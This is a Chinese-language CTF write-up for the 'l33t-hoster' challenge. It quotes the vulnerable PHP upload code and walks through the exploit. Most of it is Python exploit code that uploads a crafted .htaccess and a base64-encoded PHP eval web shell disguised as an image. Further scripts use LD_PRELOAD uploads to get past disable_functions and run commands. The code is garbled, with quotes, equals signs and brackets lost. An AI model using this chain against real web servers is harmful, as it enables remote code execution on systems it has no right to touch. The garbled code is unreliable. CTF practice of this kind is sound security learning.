l33t-hoster

发布时间:2026/6/17 19:30:16

l33t-hoster 这个题做了两天了,拼尽全力卡在最后一步,最后决定先放放。感觉是平台 flag 有点问题,之前有个题也是 flag 为空。明天总结下学习的知识点,先记录下做题过程。看了很多大佬的博客。先看源代码,发现 /?source,看这个页面,发现过滤的代码(下面贴出的代码在转载时丢失了引号、等号和尖括号等符号):
?phpif (isset($_GET[source]))die(highlight_file(__FILE__));session_start();if (!isset($_SESSION[home])) {$_SESSION[home] bin2hex(random_bytes(20));}$userdir images/{$_SESSION[home]}/;if (!file_exists($userdir)) {mkdir($userdir);}$disallowed_ext array(php,php3,php4,php5,php7,pht,phtm,phtml,phar,phps,);if (isset($_POST[upload])) {if ($_FILES[image][error] ! UPLOAD_ERR_OK) {die(yuuuge fail);}$tmp_name $_FILES[image][tmp_name];$name $_FILES[image][name];$parts explode(., $name);$ext array_pop($parts);if (empty($parts[0])) {array_shift($parts);}if (count($parts) 0) {die(lol filename is empty);}if (in_array($ext, $disallowed_ext, TRUE)) {die(lol nice try, but im not stupid dude...);}$image file_get_contents($tmp_name);if (mb_strpos($image, ?) ! FALSE) {die(why would you need php in a pic.....);}if (!exif_imagetype($tmp_name)) {die(not an image.);}$image_size getimagesize($tmp_name);if ($image_size[0] ! 1337 || $image_size[1] ! 1337) {die(lol noob, your pic is not l33t enough);}$name implode(., $parts);move_uploaded_file($tmp_name, $userdir . $name . . . $ext);}echo h3Your a href$userdirfiles/a:/h3ul;foreach(glob($userdir . 
*) as $file) {echo lia href$file$file/a/li;}echo /ul;?
确实严格,php 过滤得差不多了,我就想到了 .htaccess,但要求实在太多了,没啥思路就去看大佬博客了。(从防御角度看,问题出在扩展名黑名单只拦 PHP 后缀,.htaccess 这类服务器配置文件仍能传进可被 Web 访问的目录;应改用扩展名白名单并由服务端重新命名,把上传目录放到 Web 根目录之外,或对该目录关闭 AllowOverride。)
https://blog.csdn.net/Uchiha_duan/article/details/131706725
https://blog.csdn.net/mochu7777777/article/details/113772879
#!/usr/bin/env python3 import requests import base64 VALID_WBMP b\x00\x00\x8a\x39\x8a\x39\x0a URL https://b2a6ae701e7208e05ae1ba94.http-ctf2.dasctf.com/ RANDOM_DIRECTORY d54b886eaf53b0e1039f26d24b393565669b6816 COOKIES { PHPSESSID : m43d1fip3edjosh48kpjnqj0b2 } def upload_content(name, content): data { image : (name, content, image/png), upload : (None, Submit Query, None) } response requests.post(URL, filesdata, cookiesCOOKIES) HT_ACCESS VALID_WBMP b AddType application/x-httpd-php .jpg php_value auto_append_file php://filter/convert.base64-decode/resourcemochu7.jpg TARGET_FILE VALID_WBMP bAA base64.b64encode(b ?php echo shell ok!; eval($_POST[mochu7]); ? 
) upload_content(..htaccess, HT_ACCESS) upload_content(mochu7.jpg, TARGET_FILE) response requests.post(URL /images/ RANDOM_DIRECTORY /mochu7.jpg) print(response.text)
先看末初大佬的博客,学习到拿到 shell。然后我是在 ctf2(前buuctf)上做的,也遇到了 mochu7var_dump(file_get_contents(/flag)); 返回 bool(false) 的问题。通过看
https://blog.csdn.net/Uchiha_duan/article/details/131706725
https://github.com/mdsnins/ctf-writeups/blob/master/2019/Insomnihack%202019/l33t-hoster/l33t-hoster.md
学习到了 LD_PRELOAD 注入。(disable_functions 只是加固手段而不是安全边界,一旦上传目录里的文件能被当作脚本执行,就不能指望它兜底。)
import requests import base64 URL https://b2a6ae701e7208e05ae1ba94.http-ctf2.dasctf.com/ RANDOM_DIRECTORY d54b886eaf53b0e1039f26d24b393565669b6816 url URL /images/ RANDOM_DIRECTORY /mochu7.jpg param {mochu7:move_uploaded_file($_FILES[file][tmp_name],/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816/bypass_disablefunc.php);echo ok;var_dump(scandir(/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816));} files [(file,(bypass_disablefunc.php,open(bypass_disablefunc.php,rb),application/octet-stream))] r requests.post(urlurl, filesfiles, dataparam) print(r.text)
import requests URL https://b2a6ae701e7208e05ae1ba94.http-ctf2.dasctf.com/ RANDOM_DIRECTORY d54b886eaf53b0e1039f26d24b393565669b6816 url URL /images/ RANDOM_DIRECTORY /mochu7.jpg param {mochu7:move_uploaded_file($_FILES[file][tmp_name],/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816/bypass_disablefunc_x64.so);echo ok;var_dump(scandir(/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816));} files [(file,(bypass_disablefunc_x64.so,open(bypass_disablefunc_x64.so,rb),application/octet-stream))] r requests.post(urlurl, filesfiles, dataparam) print(r.text)
/bypass_disablefunc.php?cmdls 
/outpath/tmp/xxsopath/var/www/html/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc_x64.sohttps://274fcdc69af496cb834ecac5.http-ctf2.dasctf.com/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc.php?cmdls%20/outpath/tmp/xxsopath/var/www/html/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc_x64.so再上传官方的pl文件/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc.php?cmdperl fuck.ploutpath/tmp/xxsopath/var/www/html/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc_x64.soimport requests import base64 URL https://b2a6ae701e7208e05ae1ba94.http-ctf2.dasctf.com/ RANDOM_DIRECTORY d54b886eaf53b0e1039f26d24b393565669b6816 url URL /images/ RANDOM_DIRECTORY /mochu7.jpg param {mochu7:move_uploaded_file($_FILES[file][tmp_name],/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816/fuck.pl);echo ok;var_dump(scandir(/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816));} files [(file,(fuck.pl,open(fuck.pl,rb),application/octet-stream))] r requests.post(urlurl, filesfiles, dataparam) print(r.text)
